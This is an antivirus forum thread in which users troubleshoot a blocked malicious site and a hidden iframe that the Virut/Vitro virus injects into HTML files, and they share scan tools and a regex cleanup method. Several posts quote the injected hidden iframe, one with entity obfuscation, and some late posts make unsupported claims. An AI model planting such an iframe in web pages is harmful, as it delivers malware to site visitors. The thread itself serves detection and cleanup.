Blocked Malicious Site: jl.chura.pc/rc/

[dwarf0921]

Every time I open Mozilla Firefox 3, I always get the message for the Avast On-Access scanner "Network Shield: Blocked access to malicious site: jl.chura.pc/rc/" I can not figure out what it is causing this or how to fix it. Any help would be appreciated, thanks.

[DavidR]

Perhaps your browser home page setting has been hijacked. What is it that you are doing when it happens, e.g. just starting firefox or clicking a link that opens firefox. Do you have a home page set-up, if so confirm it hasn't changed. If you don't have the NoScript add-on for firefox I suggest that you get that too.

Also is that url correct as I believe it should be jl.chura.pl/rc/ (.pl not .pc) as that is detected as an attack site and avast is correct to block it.

There could however, be something on your system trying to connect to that site when you open your browser.

If you haven't already got this software (freeware), download, install, update and run it, preferably in safe mode and report the findings (it should product a log file).

• 1. SUPERantispyware On-Demand only in free version.
• 2. MalwareBytes Anti-Malware, On-Demand only in free version http://download.bleepingcomputer.com/malwarebytes/mbam-setup.exe, right click on the link and select Save As or Save File (As depending on your browser), save it to a location where you can find it easily later.

[bobt57]

Hi,
I too am having an issue with this url, in my case I hired some one to design an index page for one of my sites and that url ended up in an iframe line at the bottom of the page he sent me, I've asked him what is and why its there and he has not answered yet, I am hesitant to use his design until I know more.

Here is the complete line of code intentionally broken:
<iframe src="http:  //jL.chura.pl/rc/" style="display:none"></iframe>

Any insight would be appreciated and if I get an answer from my designer, I will post it here.

Thanks for reading,
Bob T

[DavidR]

avast! isn't the only one that doesn't like that site, http://linkscanner.explabs.com/linkscanner/checksite.aspx?NS=ChkOnly&SRC=apps.explabs.com&CS=http://jl.chura.pl/rc/.

It could well be that his system is infected and the malware is injecting code into the completed htm or html pages.

The iframe is hidden {display:none} which I'm always suspicious of as there really shouldn't be any reason to hide a legit iframe.

I would have expected then to check their code before releasing it and I would have expected a very prompt response.

[bobt57]

Thanks David, I appreciate you taking the time to do a little investigating, I checked the rest of the code in the page he sent and it was the only line with a url in it and there are no scripts, it is basically just a header, footer, background and some layout design, so not many places to hide something.

I also agree that my e-mail to him showing the Avast infected alert should have been promptly responded to, its been since last Wed.

And a scan of all files being sent to anyone is the polite thing to do.

I will be looking elsewhere for future html coding.

Thanks again David,
Bob

[DavidR]

No problem, glad I could help.

Yes, iframes are one of the latest attack vectors as just injecting an innocuous hidden iframe tag gets past many AVs as they simply aren't looking or capable or looking for it. Fortunately avast is and the network shield also maintains watch on many malicious sites.

Wow, last Wednesday, I would expect a response in a few hours from a professional as it is his reputation on the line. OK if it were on a weekend I could understand no response until Monday.

Welcome to the forums.

[xenowing]

I have this on my system  - <iframe src="http://jL.c&#104;ura.pl/rc/" style="&#100;isplay:none"></iframe>
Just before the closing body tag </body> on every htm / html file, and I mean every file.

I've read that this code has been linked to an exploit in IE5, which has since been patched - 2004??. So, I'm not sure how that relates to what we are seeing now.

If I delete it, it simply returns after the document is closed. I've seen similar reports where php files were infected. Also, a good number of random?? exe and dll files became infected. Which avast was able to clean - but apparently not the real root of the infection. This cleaning broke my OS, so I had to reinstall.

To bobt57
As long as your system isn't infected, you can delete the bad code and upload. Just check the code before and after uploading.

I think this is from a cracked exe file. I'm going delete all suspect, wipe my OS drive. I'll probably sandboxie all third-party installations to test for any trickery, in the future. 

[5800XM]

I found this same code in almost all HTML files one of my computers too. I found this thread while googling for "jL.chura.pl".

Here is the full story: One of my computers has been infected with a very malicious virus a few days ago. The virus was identified by F-prot as "W32/Virut.AI!Generic" and Avast identified it as "Win32:Vitro". They're probably the same virus because it was detected by both programs in exactly the same files. It infects exe files and installs a rootkit that makes it very hard to detect ... then it opens a "gate to hell" on the infected machine as it downloads all sorts of trojans and malware ...

I'm not a novice user ... I'm a software developer and I'm usually cautious ... this is the first virus to infect my computer since 6 or 7 years ago and I can assure that it's really really nasty ... I had to get rid of the entire system and reinstall Windows from scratch to get rid of that virus.

I think one of the activities that this virus does is inject the iframe code mentioned in the above posts into all html files it finds ... Among the infected files are the signature files for Outlook, which means the injected code would reach any one I send an email to. I believe Avast ought to remove this code from HTML files during scanning but unfortunately it doesn't do this currently, and the code goes undetected.

To get rid of this issue: First of all, you have a bigger problem, which is the Win32:Vitro ... you should get rid of that first. Next, I used a free program called grepWin (from http://tools.tortoisesvn.net) ... it's a very fast file search utility ... use its regular expression search to search for:

Code: [Select]

<iframe src="http://jL\.c&#104;ura.*</iframe> in all "*.htm*" files and replace it with an empty string or with something like

Code: [Select]

<!-- churs.pl was here! --> if you like.

I hope this helps someone ...

[Paul_#1]

Since there are viruses, you have to know, that they are Win32/virut.nbm and other viruses. The same virus infects (i had this virus earlier) all .exe and .dll files.

It can affect more (.scr .php .asp) so be careful! Now i'm using kaspersky and haven't had this virus again...

These viruses from jl.chura.pl are extremely dangerous and came all the way from china!!!

That's all i know.

[Paul_#1]

Oh, yeah... I absolutely forgot  it spams every email in the internet you have e-mail or not.